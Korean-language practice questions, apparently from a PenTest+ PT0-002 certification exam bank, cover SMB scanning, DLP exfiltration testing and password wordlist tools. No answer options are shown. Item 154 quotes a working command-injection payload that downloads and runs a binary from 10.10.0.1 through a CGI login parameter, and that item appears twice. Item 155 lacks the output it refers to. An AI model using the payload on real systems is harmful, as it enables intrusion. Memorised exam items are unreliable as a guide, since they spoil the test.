PT0-002 문제 151
보안 분석가는 a/16 네트워크를 통해 SMB 포트 445에 대한 검색을 수행해야 합니다. 스텔스가 문제가 되지 않고 작업이 시간에 민감한 경우 다음 명령 중 가장 좋은 옵션은 무엇입니까?
PT0-002 문제 152
침투 테스터는 이메일 첨부 파일을 사용하여 데이터 유출을 시도하여 DLP 제품의 효율성을 검증하려고 합니다. 이 작업을 수행하기 위해 테스터는 다음 중 어떤 기술을 선택해야 합니까?
PT0-002 문제 153
다음 중 침투 테스터가 웹 사이트를 크롤링하고 웹 사이트의 비밀번호를 해독하기 위해 복구된 데이터를 사용하여 단어 목록을 작성하는 데 사용해야 하는 도구는 무엇입니까?
PT0-002 문제 154
침투 테스터가 익스플로잇을 사용하여 시스템에 액세스할 수 있었습니다. 다음은 활용된 코드의 일부입니다.
익스플로잇 = "POST"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후에 실행해야 하는 명령은 무엇입니까?
익스플로잇 = "POST"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS}./apache'%0A%27&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후에 실행해야 하는 명령은 무엇입니까?
PT0-002 문제 155
다음 출력은 공공 은행 웹사이트를 조사한 결과입니다.

이러한 결과를 바탕으로 볼 때, 다음 공격 중 성공할 가능성이 가장 높은 공격은 무엇입니까?

이러한 결과를 바탕으로 볼 때, 다음 공격 중 성공할 가능성이 가장 높은 공격은 무엇입니까?
